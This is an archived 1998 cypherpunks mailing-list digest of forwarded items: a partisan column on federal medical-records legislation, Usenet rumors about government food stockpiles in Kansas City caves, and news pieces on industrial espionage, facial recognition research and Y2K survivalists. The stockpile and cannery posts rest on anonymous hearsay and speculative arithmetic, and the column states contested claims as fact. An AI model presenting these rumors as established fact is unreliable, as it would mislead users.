personal medical records.

After this news broke on July 18, embarrassed Congressmen inserted a line in
H.R. 4250, which passed July 24, ordering HHS not to promulgate "a final
standard" without Congressional authorization. That language is a total
phony; it doesn't prevent HHS from issuing proposed or interim standards
(which will become de facto standards) or from collecting medical data.

So much money is involved in accessing and controlling personal information
that the Washington lobbyists are moving rapidly to lock in the
extraordinary powers conferred by the Kennedy-Kassebaum law. That explains
these sneaky eleventh-hour inserts in pending legislation.

On August 4, the House passed yet another bill to protect the gathering of
personal information on private citizens. To paraphrase Ronald Reagan, there
they go again.

Just before passing H.R. 2281, a bill about copyrights on the Internet, the
House quietly attached a separate and dangerous bill deceptively entitled
the "Collections of Information Antipiracy Act."

No one, of course, is in favor of "piracy," but the impact of this bill goes
far beyond any reasonable definition of piracy. By the legerdemain of
inserting it in another bill, it will go straight to a House-Senate
conference committee under a procedure designed to avoid debate or
amendments in the Senate.

This Collections of Information bill (now part of H.R. 2281), in effect,
creates a new federal property right to own, manage and control personal
information about you, including your name, address, telephone number,
medical records, and "any other intangible material capable of being
collected and organized in a systematic way." This new property right
provides a powerful incentive for corporations to build nationwide databases
of the personal medical information envisioned by the Kennedy-Kassebaum law
and the Patient Protection bill.

Under the Collections of Information bill, any information about you can be
owned and controlled by others under protection of Federal law. Your medical
chart detailing your visits to your doctor, for example, would suddenly
become the federally protected property of other persons or corporations,
and their rights (not your rights) would be protected by Federal police
power.

This bill will encourage health care corporations to assign a unique
national health identifier to each patient. The government can then simply
agree to use a privately-assigned national identifier, and Clinton's
longtime goal of government control of health care will be achieved.

This bill creates a new federal crime that penalizes a first offense by a
fine of up to $250,000 or imprisonment for up to 5 years, or both, for
interfering with this new property right. It even authorizes Federal judges
to order seizure of property before a finding of wrongdoing.

H.R. 2281 grants these new Federal rights only to private databases, and
pretends to exclude the government's own efforts to collect information
about citizens. But a loophole in the bill permits private firms to share
their Federally protected data with the government so long as the
information is not collected under a specific government agency or license
agreement.

This loophole will encourage corporations, foundations, Washington insiders
and political donors, to build massive databases of citizens' medical and
other personal records, and then share that data with the government. And,
under the House-passed bill cynically called the Patient Protection Act,
patients would be unable to invoke state privacy laws to protect their
personal records.

Meanwhile, in another aspect of the Federal takeover of all Americans'
health care, the Centers for Disease Control is aggressively building a
national database of all children's medical records through the ruse of
tracking immunizations.

Tell your Congressman and Senators you won't vote for them in the upcoming
elections unless they immediately stop all Federal plans to track and
monitor our health or immunization records.

Phyllis Schlafly column 8-19-98


[thanks to jim groom for finding this piece]
[message forwarded by]
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================








**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 10:32:05 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [Fwd: Govt.Storing MRE's In Caves]
Message-ID: <199809090224.TAA18245@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: me <bucsplace@cchat.com>
Subject: IP: [Fwd: Govt.Storing MRE's In Caves]
Date: Tue, 08 Sep 1998 08:45:42 -0400
To: IP <ignition-point@majordomo.pobox.com>

This is a multi-part message in MIME format.
--------------08FDE2A053FE721F529722FE
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit



--------------08FDE2A053FE721F529722FE
Content-Type: message/rfc822
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Path: news.dx.net!uunet!in5.uu.net!xmission!newsfeed.berkeley.edu!su-news-hub1.bbnplanet.com!news.bbnplanet.com!pln-w!spln!extra.newsguy.com!newsp.newsguy.com!enews3
From: "Steve" <peach2@rocketmail.com>
Newsgroups: misc.survivalism
Subject: Re: Govt.Storing MRE's In Caves
Date: 7 Sep 1998 23:00:31 GMT
Organization: http://extra.newsguy.com
Message-ID: <01bddab3$a25f5600$d34ae5d0@maddog1.camalott.com>
References: <1998090721534800.RAA12052@ladder01.news.aol.com>
Reply-To: "Steve" <maddog1@camalott.com>
NNTP-Posting-Host: p-499.newsdawg.com
X-Newsreader: Microsoft Internet News 4.70.1161

I can vouch for the existance of these caves in KC.....been by there many
times in the days of my youth( lived there '56-'88). The interesting thing
is the government(FED) kicked the private business's that were using them
for warehousing/storage out....declaring that the caves were unsafe and
dangerous. Funny thing is.....they weren't unsafe enough for the FED's to
use.
Steve
West Texas
-- 
"We the people are the rightful masters of both Congress and 
  the courts, not to overthrow the Constitution, but to overthrow
  the men who pervert the Constitution."  --- Abraham Lincoln       
"You know, of course, that this means war..." Bugs Bunny to Elmer Fudd:
1942

PAPACHUBY2 <papachuby2@aol.com> wrote in article
<1998090721534800.RAA12052@ladder01.news.aol.com>...
 Hi, This is off the Ark list.  Interesting.  S.

 Below are two differnet notes that I received today.  I took all
 the return paths off of these so that they can be passed around.
 I personally know both sources and they are EXTREMELY credible.
 Perhaps we can locate a source near Kansas City..to look into
 this (with pictures)......I am MOST curious...
 marie
 - - - - - - - - - - - - - - -
 name

 Here's the post I received yesterday from a Y2K chat friend
 regarding the situation. The second message is one I received today 
 from him. He'll be keeping me posted on what else he learns.

 Jeff

 > >>>>>>>>>>>>>

Yesterday's Post-------

Dear friends,

As some of you know, I live in a poor and working class
neighborhood in kansas city, and am involved with various activities that
help poor people become less poor.  As part of this, I often take in
people who are homeless, or would be if not for a safe harbor. One of my
housemates just got a four month temporary job unloading trucks at an
underground storage center located near my neighborhood (KC has a lot of
underground  limestone caves that are used for storage). Anyway, this
particular contract is a government contract, and  the product being
unloaded and stored is MRE's. that is, "meal  ready to eat", which i 
believe is the current incarnation of the old army c rations. how many 
mre's are on a truck? all day, 8 hours a  day, for four months.  
that is a LOT of meals ready to eat.

Note that I didn't hear this from somebody who heard from somebody, i
heard this from somebody in my own household who is unloading the mres,
beginning at 7:30 in the am.

Three things: First, I am comforted to know that this large amount of 
food is being stored here locally. Second, if you have any fiends or
acquaintances who do temporary labor or casual jobs, you might ask 
around and see if any such operations are going on in your city.Three, 
somebody is taking this really seriously. mre's aren't cheap.

Today's Post --------------

Dear Jeff and everybody,

Today they unloaded nine trucks, and then were let go early
because some additional expected trucks didn't show. It takes two
guys about 1-1/2 hours to unload a truck, and each gets $35. Don't know
if this space has been used to store mre's before, but that's on the list
of questions to scope out.  It does seem to be a government contract, 
the supervisors seem sure of that. It has been confirmed that this is 
new, that is, it isn't the regular cold storage location for Ft.
Leonard Wood, etc. One of the other laborers said that each truck 
had 3500 cases, so today there were nine trucks times 3500 cases
equals 31,500 cases. Anybody know how  many mre's are in a case?  
This would seem to be literally an  enormous amount of food, as if 
there were six mre's in each case, that  would mean 189,000 means 
were unloaded today alone, and today was a short day.  He was called 
back to work at 3:30 in the afternoon, but  the expected trucks still 
didn't arrive.

Note that the laborers apparently have to +spc- a certain
amount of time sitting around and waiting. Since the contract is for
four months, 22 work days a month, and if today's unloading was an  
average work day, and there are at least six mre's per case, then  
we're talking a minimum of 16,632,000 mres. Any way you look at that, 
it is a large amount of prepared food, being tucked securely away  
in a limestone cavern in KCMO.

It's three meals a day for 500,000 people for 11 days, and that's 
the low estimate, since today was deemed a slack day by those doing 
the labor.

 - - - - --
Note: this is from another source... came in after the top portion....

> >>>>>>>>>>>>
I researched MRE's just this evening to learn more about
them. The full meal type MRE comes 12 per case, and the case weighs 17
pounds. So, for doing some math, double the figures you were dealing  
with. Using Robert's math that would come to 33,264,000 meals - 
using 22 work days per  month, for 4 months, and the light work load 
experienced by Robert's friend that particular day.

Assuming 12 per case, that's 2,772,000 cases at 17 pounds per
case equals 47,124,000 pounds of food, or 23,562 tons. That would
mean you could feed 500,000 people 3 meals per day for 22.17 days or
roughly 100,000 people for just over 3 months (about 111 days actually).
These are large numbers indeed and we can all look forward to learning
more about this.  Robert, can you put the local news people on it
to open it up?  Would that be wise or not? I don't know, but if
appropriate, it's one heck of a story they may wish to track down.  
God bless all of you,

<< End of Forwarded message >>
[snip]
Local Y2K Update:

I received a telephone call from a highly credible source.  This 
informant told me that government employees recently attended a Y2K 
meeting in Orange County.  At this meeting, one of the handouts was a 
listing of all the Mormon Canneries.  Even more disturbing was the 
fact, these employees were casually told not to make this public so 
that they could have the necessary time to acquire their long-term 
storage food first.


--------------08FDE2A053FE721F529722FE--






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 10:31:56 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Industrial Espionage Increases as Firms Seek Competitive Edge
Message-ID: <199809090224.TAA18256@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Richard Sampson <rjsa@sprintmail.com>
Subject: IP: Industrial Espionage Increases as Firms Seek Competitive Edge
Date: Tue, 08 Sep 1998 12:52:43 -0400
To: "ignition-point@majordomo.pobox.com" <ignition-point@majordomo.pobox.com>

 Industrial Espionage Increases as Firms Seek Competitive Edge
Sep. 6 (The Record/KRTBN)--The place: the Four Seasons Hotel,
Philadelphia. The date: June 14, 1997.

On one side of the table, two men from a Taiwanese company hoping to
expand into biotechnology. On the other, an FBI agent posing as an
information broker, and a researcher from Princeton-based Bristol-Myers
Squibb posing as a corrupt scientist preparing to sell a piece of his
company's soul.

On the table: a sheaf of papers -- stamped "confidential" in big,
black letters -- representing the company's investment of hundreds of
millions of dollars in Taxol, the blockbuster anti-cancer drug. The
asking price, according to the FBI: $200,000 and a percentage of sales.

The drama played out in that hotel room -- which ended when additional
FBI agents burst through the door and arrested the Taiwanese -- marked
the first federal sting operation against alleged spies for a foreign
corporation.

But industrial espionage today is far from unusual. U.S. companies are
increasingly being looted of some of their most precious technical
secrets by competitors -- both foreign and domestic -- using legal and
illegal methods. And New Jersey's research labs and high-tech companies
-- particularly pharmaceutical companies -- are prime targets.

>From 1992 to 1996, according to one study, the number of  cases of
industrial espionage at the nation's 1,300 largest companies nearly
doubled to about 1,100.  The potential commercial value of the stolen
information was pegged at $300 billion.

Richard Heffernan, a Branford, Conn., consultant who conducted the
study for the American Society of Industrial Security of Alexandria,
Va., said New Jersey pharmaceutical companies -- including Merck & Co.,
Schering-Plough, Warner-Lambert, and Johnson & Johnson -- have all been
targeted by corporate spies.

The reason: the hundreds of new products in their research and
development pipelines -- products that require huge investments in time
and money. Those pipelines hold the potential for billions of dollars
in profits.

"New Jersey is one of the top 10 areas for corporate espionage," said
Heffernan, who has advised a number of New Jersey drug companies on
ways to protect their secrets. "This is not a new thing for
pharmaceutical companies, and it's become progressively worse. There's
so much money to be made from the theft of their information. That
pipeline is a very deep, rich vein of gold."

In addition to illegal intrusions -- which can include anything from
hacking into a private computer to buying trade secrets from a company
insider -- more companies are targeting competitors' secrets using
legal -- but in some cases, unethical, or highly intrusive -- methods.

Membership in the Society of Competitive Intelligence Professionals --
an Alexandria, Va., group that advocates the use of legal methods to
gather business intelligence on competitors -- has skyrocketed in
recent years, more than quadrupling since 1990.

For the most part, competitive intelligence professionals analyze data
from public sources -- news reports, databases, trade shows, and the
like. But they also tap more questionable sources, such as satellite
photos. And they have indicated a widespread willingness to step over
ethical lines to obtain information on business rivals.

In a survey published in April by the competitive intelligence group,
participants -- all corporate spies -- were given several scenarios and
asked to choose from various options on how to proceed. Nearly half
said they were willing to misrepresent the purpose of their research,
30 percent were prepared to read a marketing report left on an adjacent
airplane seat, more than 70 percent said it was permissible to pump a
new hire for confidential information about her previous employer, and
20 percent were willing to read and use a competitor's proprietary
product data.

All of those tactics violate the competitive intelligence group's own
code of ethics, and the last might step over legal lines as well,
according to the survey's authors.

"I think there is room for some very legitimate information gathering
that's important for companies to do," said Gayle Porter, an authority
on business ethics at Rutgers University. "But I think there are
probably many, many, many examples of people taking it too far."

In New Jersey, there are abundant examples of companies alleging that
they have been targets of industrial espionage -- or who have been
accused of targeting others.

In 1996, Boehringer Mannheim Corp., a German drug company competing
against New Brunswick-based Johnson & Johnson in the $1.75 billion
market for blood-monitoring devices, sued J&J and its LifeScan
subsidiary in federal court.

Boehringer alleged that LifeScan offered employees incentives for
spying on its archrival, and that LifeScan employees sneaked into
Boehringer sales meetings in Indiana, Florida, Turkey, and Germany to
obtain proprietary product information. J&J denied the charges and in a
countersuit said Boehringer hired detectives to obtain secrets and had
workers pose as customers.

Boehringer acknowledged some of J&J's charges, including that it had
reprimanded an executive for posing as an importer to obtain a
demonstration of a product not yet on the market, and that it had
maintained a "competitive kill team" targeted at LifeScan.

But the two companies reached an out-of-court settlement in 1997,
agreeing to keep the terms of the settlement secret. J&J spokesman
Jeffrey Leebaw declined to comment. Boehringer did not return calls.

Heffernan and others say industrial espionage is on the rise because
of tougher competition in domestic markets, the targeting of U.S. trade
secrets by foreign economic and industrial interests, and the
combination of computer hackers with increasing technical
sophistication and companies that are woefully unprepared to stop them.

And they say one of the times companies become vulnerable is when
high-level employees leave.

Executives with knowledge of marketing plans for new products and
researchers responsible for developing the next big scientific
breakthrough are often exploited by their new employers to obtain a
competitive edge.

That is what Warner-Lambert of Morris Plains charged in a 1997 lawsuit
that was subsequently dropped.

The company spent 12 years and $17 million developing Procan SR, a
sustained-release drug used to treat heart rhythm irregularities. The
product won Food and Drug Administration approval in 1982.

Warner-Lambert accused a former employee of giving the top-secret
formulas for the drug to Copley Pharmaceutical Inc., a Canton, Mass.,
generic drug manufacturer she went to work for in 1984. Seven months
after she joined the company, Copley asked the FDA to approve a generic
version of the drug, which Copley eventually brought to market.

Neither company would comment on the settlement that ended the matter,
but Jason Ford, a Warner-Lambert spokesman, said the drug -- which was
discontinued several years ago by the company -- was never a
blockbuster.

"It wasn't so much the stealing of the product," Ford said. "The main
reason why we filed the lawsuit was to make it clear that we vigorously
defend our intellectual property. It sends a loud and clear message
that this is something we take very seriously."

Another North Jersey company, the Wormser Corp. of Englewood Cliffs,
also played a key role in an industrial espionage case involving a
former employee -- not as the victim, but as the accused.

The case centered on Frederick Marks III, a production manager
employed by Powell Products Inc. of Colorado Springs, Colo., until
1993. According to a lawsuit filed by Powell in 1995, Marks took with
him top-secret blueprints for a machine developed by Powell  to
mass-produce foam-tipped swabs more quickly and cheaply than any other
machine then available.

Powell accused the Wormser Corp. of bankrolling a plan to use the
stolen blueprints to create a prototype of the Powell machine, and
using the machine to compete against Powell.

After two years of litigation, a Denver jury awarded Powell $2.7
million in damages and legal fees, but Powell settled with the Wormser
Corp. for $1.7 million. Marks pleaded guilty to misdemeanor theft in
February in exchange for his cooperation with the FBI. The Wormsers --
company president Stephen, and his sons, Alan and David -- have not
been charged.

David Wormser referred questions to Bill Meyer, a Boulder, Colo.,
lawyer who denied the allegations, saying the Wormsers settled with
Powell to avoid "years and years" of legal wrangling. Powell President
Stephen Robards said the Wormsers are the true culprits.

"There's no question about it," he said. "The blueprints Marks stole
would not have damaged us without the Wormsers' money. He didn't have
the resources to start a business without them."

Since the passage of the 1996 Economic Espionage Act (EEA) making the
theft of trade secrets a felony, the FBI has become more involved in
industrial espionage cases in which U.S. companies have been targeted
by foreign or domestic interests.

To date, five cases have been brought under the act, including one in
July in which a Piscataway man -- a former scientist for Roche
Diagnostics, a Branchburg division of Nutley-based Hoffmann-La Roche --
was charged with attempted theft of trade secrets from the company.
According to the complaint, Huang Dao Pei tried to obtain secrets from
a current Roche scientist about the company's hepatitis C diagnostic
kit, hoping to market a similar kit in China.

William Megary, special agent in charge of the FBI's Newark office,
said individuals trying to steal American trade secrets are not "street
thugs," but high-tech thieves who are "educated, resourceful, and
elusive."

"Our cases illustrate the complexity of not only how diverse the
criminals are, but how diverse the crimes are, as well," he said. "The
FBI is committed to enforcing the EEA. Our message is clear -- it is no
longer open season on American technology."

Even before the act became law, federal stings were not unheard of.
 In the Bristol-Myers Squibb case, FBI agent John Hartmann established
himself as a technology information broker in 1995 and began laying a
paper trail of more than 135 faxes, e-mail messages, telephone calls,
and letters with the representatives of the Yuen Foong Paper Co., which
would eventually lead to the fateful meeting at the Philadelphia hotel.

Jane Kramer, a spokeswoman for Bristol-Myers Squibb, said the company
uses "the most sophisticated techniques" for safeguarding its trade
secrets, but she would not elaborate. When security is breached, she
added, it is important for a company to fight the intruder with every
weapon in its arsenal.

"Taxol is a major advance in cancer treatment," she said, adding that
the company's multimillion-dollar investment in research on the drug is
more than repaid by its $1 billion in annual sales. "You have a
dramatic investment in research and development that's the lifeblood of
a company like ours. The ramifications are huge for our present and our
future."

In what authorities described as the largest industrial espionage case
in U.S. history, a 1990 FBI sting led to charges against two men for
stealing secrets valued at $1 billion from Merck & Co. in Whitehouse
Station and Schering-Plough Corp. in Madison.

Biochemist Bernard Mayles, a former employee of the two companies, and
a confederate, Mario Miscio, were ultimately convicted of trying to
sell the secret formulas for Ivermectin, an anti-parasitic drug
marketed by Merck, and Interferon, a cancer and hepatitis treatment
sold by Schering-Plough.

An FBI agent posing as a Chinese investor who wanted to convert an
idle factory for Ivermectin production agreed to pay $1.5 million for
the formula and the microorganism used to produce the drug. He promised
to arrange the sale of the Interferon formula to a Polish investor for
$10 million.

Schering-Plough spokesman Ronald Asinari declined to comment, but
Merck spokeswoman Maggie Beute said her company has taken additional
steps to safeguard secrets in recent years, including beefing up
computer security and being more vigilant about getting vendors to sign
confidentiality agreements.

"There's so much at stake here," she said. "Anything that shortens the
life of any of our products is going to have detrimental effects on our
ability to recoup our investment in R&D. As an industry, we're very
focused on making sure our intellectual property rights aren't
violated."

Illegal intrusions such as those against Merck, Schering-Plough, and
Bristol-Myers Squibb have created a cottage industry for consultants
who advise companies on how to keep their secrets safe.

Andy Welch, a senior consultant at KPMG Peat Marwick's risk-management
practice, said business has increased tenfold in two years. Two out of
three companies who come to him for help are taking preventive
measures, but the others have already suffered security breaches.

Welch examines personnel policies to make sure there are procedures
for deactivating computer passwords when employees leave. And he
attempts to hack into the company's system from the outside to find its
weak links, such as the ability to dial in to a company's computer
system without a password.

He said many companies are not prepared to deal with the threat of
corporate espionage, especially intrusions into their computer systems,
where many of their most valuable secrets reside.

"The indication is that there is a large degree of unpreparedness out
there," Welch said. "It needs to be taken seriously. I can't tell you
with a straight face that everything is warm and fuzzy out there."

By Louis Lavelle

-0-
 Visit The Record, Hackensack, N.J., on the World Wide Web at
http://www.bergen.com

(c) 1998, The Record, Hackensack, N.J. Distributed by Knight
Ridder/Tribune Business News.  BMY, MRK, SGP, WLA, JNJ, CPLY,
END!A$9?HK-BIZ-ESPIONAGE


News provided by COMTEX.
[!BUSINESS] [!COMMUNITY] [!HEALTHCARE] [!WALL+STREET] [BIOTECHNOLOGY]
[BUSINESS] [CANCER] [CHINA] [COLORADO] [COMPUTER] [CORPORATE] [DOLLAR]
[E-MAIL] [ESPIONAGE] [FDA] [FLORIDA] [FOOD] [GERMANY] [GOLD] [INDIANA]
[INVESTMENT] [KRT] [LAWSUIT] [MARKET] [MARKETING] [MEN] [MONEY]
[NEW+BRUNSWICK] [NEW+JERSEY] [NEWS] [NEWSGRID] [PIPELINE] [PRODUCTS]
[PROPERTY] [RESEARCH] [SALES] [TECHNOLOGY] [TRADE] [TURKEY] [USA]


--
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a
prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 10:30:54 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Machine Vision For Biometric Applications
Message-ID: <199809090224.TAA18267@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Machine Vision For Biometric Applications
Date: Wed, 09 Sep 1998 09:07:57 -0500
To: believer@telepath.com

----------------------
NOTE:  Document contains instructive images.  You should go to the website
and open the images.
----------------------

Source: Applied Optics Group at the University of Kent at Canterbury (U.K.)
http://speke.ukc.ac.uk/physical-sciences/aog/facereco/

Machine Vision For Biometric Applications 

We are currently conducting research in the areas of automated facial
recognition and data compression of digitised images of the human face.
This work began by performing an eigenfactor  analysis on a data set
comprising 290 faces drawn largely from the student population at the
University of Kent, Canterbury. 

The image below shows the first three components (eigenfaces) resulting
from this analysis. It is interesting to note that eigenfaces 2 and 3 have
a clear relationship to gender. Thus the addition of eigenface 2 to the
average eigenface (1) results in a feminine face whereas the subtraction of
face 2 produces a face having masculine characteristics. In a similar way,
addition of face 3 to the average produces a masculine face and subtraction
of face 3 from the average results in a face having feminine features. 

This approach, variously known as the Karhunen-Loeve expansion, eigenfactor
analysis, principal components or the Hotelling transform has exceptional
data compression properties when applied to this particular pattern class
(2-D images of human faces).

Below, we show the image reconstruction quality that is achievable using
codes of varying lengths which describe how to reconstitute the image using
the component eigenfaces as a basis. Note that the subject shown here was
not included in the original data set used to generate the eigenface basis.
Despite this, recognition is achieved using a very short code. 

This method works particularly well when conditions such as head-camera
orientation and subject illumination are controlled.We are now
investigating other methods (some related to the Karhunen-Loeve expansion,
some not) which may be suitable for automated facial recognition under less
benign conditions. In particular, we are beginning to investigate the use
of illumination compensation techniques and 3-D imaging techniques which
are independent of illumination conditions. 

The group working on facial recognition here at UKC collaborates with a
number of commercial/industrial organisations in the U.K. and Europe. We
currently await the outcome of a cooperative research bid (CRAFT) to the
European Commission which will involve the development of facial biometrics
for smart cards and other access control applications. The industrial
partners are Neural Computer Sciences (U.K.), Datastripe Ltd (U.K.), Inside
Technologies (France), Smartkort (Iceland) and A la Carte (Belgium). 

More links on Facial Recognition 

 Staff Involved 

 Dr. C.J. Solomon - E-mail: C.J.Solomon@ukc.ac.uk 
 Jamie P. Brooker - E-mail: jpb3@ukc.ac.uk 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 10:31:41 +0800
To: cypherpunks@cyberpass.net
Subject: IP: " Will Y2K usher in TEOTWAWKI?"
Message-ID: <199809090224.TAA18278@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: " Will Y2K usher in TEOTWAWKI?"
Date: Wed, 09 Sep 1998 12:49:38 -0500
To: believer@telepath.com

Source:  Dallas Morning News
http://www.dallasnews.com/texas-southwest-nf/tsw1.htm

 Turn for the worst? 

 09/06/98

 By Victorial Loe Hicks / The Dallas Morning News 

 A CAVE IN ARKANSAS - Will Y2K usher in TEOTWAWKI?

 Bryan Elder is sure it will - so sure that he'll be deep
 beneath the ground on Jan. 1, 2000.

 "As soon as I get a cave, I'm going to live in it," Mr.
 Elder vowed, wending his way through one
 Arkansas cavern. "I'll be the world's next caveman."

 Y2K is the pop-culture moniker for the
 programming glitch that left millions of computers
 and other devices unable to recognize dates beyond
 the year 1999. The disruption will depend on how
 many faulty mainframes, PCs and microchips - in
 everything from nuclear plants to VCRs - can be
 detected and fixed in the next 16 months.

 Most people regard Y2K with mild to moderate
 anxiety. But a flourishing subculture insists that it
 portends nothing less than TEOTWAWKI
 (tee-OH-tawa-kee): The End of the World as We
 Know It.

 "There won't be any accidental survivors," said Mr.
 Elder, who believes that computer failures will
 short-circuit the electric grid and the transportation
 system, fostering severe food shortages and social
 anarchy.

 "I'm not afraid of dying," he said. "I'd prefer not to
 starve to death."

 His scenario - which also envisions nuclear war,
 bombardment by asteroids, incineration by solar
 windstorm, the flip-flop of the North and South
 poles, an ice age and the second coming of Jesus
 Christ - is one of the more dramatic, even among
 Y2K alarmists. But he isn't alone in hunkering down.

 Merchants of survival goods say business is
 booming, primarily driven by new customers who
 are girding for Y2K. Anecdotes abound of city
 dwellers, including some computer jocks, who are
 poised to flee to the boonies, where they can store
 and grow food without having to fend off rapacious
 neighbors.

 Dallas systems analyst Steve Watson told Wired
 magazine that he bought 500 remote Oklahoma
 acres and several guns after recognizing the full
 ramifications of the Y2K crisis.

 Mr. Watson did not respond to interview requests
 from The Dallas Morning News. A vice president
 of the firm he works for, DMR Consulting, said Mr.
 Watson had come to regret his public stance, which
 "the company doesn't share."

 But in one respect, every cautionary voice is right.

 Y2K is absolutely guaranteed to happen. In a
 mounting wave that will crest powerfully on Jan. 1,
 2000, computers will encounter dates in which the
 two-digit year field reads 00, which "noncompliant"
 computers will read as 1900.

 Depending on whether a particular computer needs
 to know what year it is - to calculate accrued
 interest, for example, or to track maintenance
 schedules of industrial machinery - it may go on
 working normally, produce bad data or simply
 freeze up. If enough computers fail - say, at banks
 or telephone companies - the whole country,
 perhaps the world, could wake up with a whale of a
 New Year's hangover.

 By some estimates, industries and governments will
 spend as much as $600 billion to make things right.
 Even so, the Gartner Group, a research firm that has
 studied the issue since 1989, forecasts that half of
 the companies around the world will experience
 some disruption of their operations, further sapping
 an already woozy global economy.

 Precisely who will get hurt, how badly and for how
 long is the question - a question impossible to
 answer.

 "The uncertainty factor is immense. That's what
 makes this prophetic material," said Dr. Richard
 Landes, director of the Center for Millennial Studies
 at Boston University.

 "Back when I first heard about Y2K, I immediately
 realized that this would be grist for the apocalyptic
 prophets' mills."

 At a vigorous 32, Mr. Elder hardly fits the hoary
 image of a prophet.

 A marketing major from the University of Arkansas,
 he ran his own hydraulic service company until a
 couple of years ago, when he began devoting himself
 to studies of biblical prophecies and other spiritual
 texts.

 "The angel of death, that's how I feel," he said.

 He wants urgently for others to heed his warning, to
 believe, as he does, that anyone who remains above
 ground faces certain annihilation. Once the power
 grid goes dark, as he is sure it will, the financial
 system will collapse, he said.

 "Then we're back to the barter system and 'How
 much food do you have?' "

 That's only a prelude however. On May 5, 2000,
 Mr. Elder said, most of the planets in the solar
 system will align themselves on the opposite side of
 the sun from Earth. That will trigger the solar gales
 and the asteroid shower, which will precipitate still
 further catastrophes.

 "The computer problem will weed out a lot, and the
 solar wind will get the rest," he said. "The time to
 prepare is right now."

 For prepare, read: find a cave. Mr. Elder has his
 sights on one near Cassville, Mo., that he figures can
 accommodate 125 people.

 If he can reach a deal with the present owners, he
 plans to add plumbing, ventilation, diesel-fired
 generators, grow lights and enough basic supplies to
 sustain life for as long as seven years. Everyone will
 share the costs - $11,743 per person, he calculates.

 Byron Kirkwood isn't ready to live in a cave, but he
 does plan to be prepared for Y2K. Which in his
 case is easy, since he runs a mail-order survival
 products business from his rural Oklahoma home.

 He started the company six years ago, after his wife,
 Annie, said she received messages from the Virgin
 Mary - which she passed on in a series of books -
 warning that cataclysmic "earth changes" were
 imminent.

 These days, though, most of Mr. Kirkwood's
 customers are more worried about whether Y2K
 will cripple the U.S. economy than whether the
 Earth is about to turn on its side and acquire a
 second sun.

 Mrs. Kirkwood said Mary has not explicitly
 addressed Y2K, although she did warn recently that
 "major changes . . . will come about through
 government, banking institutions and
 telecommunications. Your power sources will be
 interrupted, and your life will change drastically."

 "That sure fits Y2K," Mr. Kirkwood said, "but she
 didn't come right out and say, 'The computers will
 fail.' "

 In any case, he said, sales of his survival products
 are up five-fold over last year, with water filters,
 hand-cranked radios and long-shelf-life foods
 leading the list.

 A rack in his office displays freeze-dried entrees -
 pepper steak, cheese ravioli and chili - packaged
 with individual chemical heating units. Some orders
 have come from as far away as Hong Kong and
 Austria.

 Like many Y2K pessimists, he gets much of his
 information and does much of his business via the
 Internet - using computers to bewail humankind's
 impending betrayal by computers.

 "I'm not trying to be a doomsayer," Mr. Kirkwood
 said. "I only give TEOTWAWKI a 10 percent
 chance of happening."

 However, he said, if food becomes scarce, "there's
 not enough police, not enough national guard, not
 enough military to go around."

 Those who stockpile food, water and cash - or who
 head for the hills - may look foolish to those who
 don't, he said, but only time will tell who are the real
 fools.

 "Some of us will look stupid one way, or some of us
 will look stupid the other way," he said. "You just
 don't know which side of stupid you're going to be
 on."

 Although Y2K is a purely technological, secular
 problem, there is a strong nexus between Y2K
 anxieties and religious millennialism, which predicts a
 catastrophic cleansing as the precursor to a new
 paradise.

 Like the Kirkwoods and Mr. Elder, the Dallas Area
 Y2K Community Preparedness Group is overtly
 Christian. The Rev. Pat Robertson's Christian
 Broadcasting Network has extensive Y2K links on
 its Web site.

 And Dr. Gary North, whom some regard as the
 Paul Revere of the Y2K crisis, is prominent in the
 Religious Reconstruction movement, which
 advocates replacing the Constitution with biblical
 law. Dr. North used to live in Tyler, Texas, but he
 has moved to northern Arkansas, which, like eastern
 Oklahoma, offers solitude to separatists of various
 persuasions.

 "The millennial myth can take secular or religious
 forms," said Dr. Philip Lamy, a sociologist at
 Castleton State College in Vermont who studies
 millennial movements.

